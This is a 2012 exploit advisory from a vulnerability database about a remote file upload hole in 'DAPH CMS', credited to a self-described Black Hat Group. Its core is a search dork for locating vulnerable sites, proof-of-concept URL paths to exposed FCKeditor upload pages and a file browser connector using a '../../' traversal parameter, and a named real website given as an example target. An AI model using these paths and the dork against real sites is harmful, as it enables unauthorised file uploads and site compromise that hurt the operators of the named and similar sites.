DAPH CMS Remote File Upload (RFU) Vulnerability

2012.02.06
Credit: Nitrojen90
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:Animal Production and Health (DAPH)

# Exploit Title: DAPH CMS Remote File Upload (RFU) Vulnerability # Date: 2012-02-04 [GMT +7] # Author: BHG Security Center # Discovered : Nitrojen90 # Software Link: http://www.daph.gov.lk/ # Dork: inurl:Animal Production and Health (DAPH) # Tested on: ubuntu 11.04 # CVE : - ----------------------------------------------------------------------------------------- DAPH CMS Remote File Upload (RFU) Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center Date : 2012-02-04 Location : Iran-Tehran Web : http://Black-Hg.Org Critical Lvl : Mediom Where : From Remote My Group : Black Hat Group #BHG ----------------------------------------------------------------------------------------- Remote File Upload (RFU) ## go to Target And Type the /fckeditor/editor/filemanager/connectors/uploadtest.html in front of www.site.com/admin . P0C : 1- /admin/fckeditor/editor/filemanager/connectors/uploadtest.html 2- /admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../&Connector=connectors/php/connector.php Example : 1- http://nxsdbp.org.kh/admin/fckeditor/editor/filemanager/connectors/uploadtest.html ----------------------------------------------------------------------------------------- @@@ Special Thanks to : Net.Edit0r | A.Cr0x | 3H34N | 4m!n | ArYaIeIrAn | G3n3Rall | NoL1m1t | Mr.XHat | Bl4ck.Viper @@@ $$$ My Good Frineds : Hellboy - Cyrus(fr0nk) - md.r00t $$$

References:

http://www.daph.gov.lk/


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top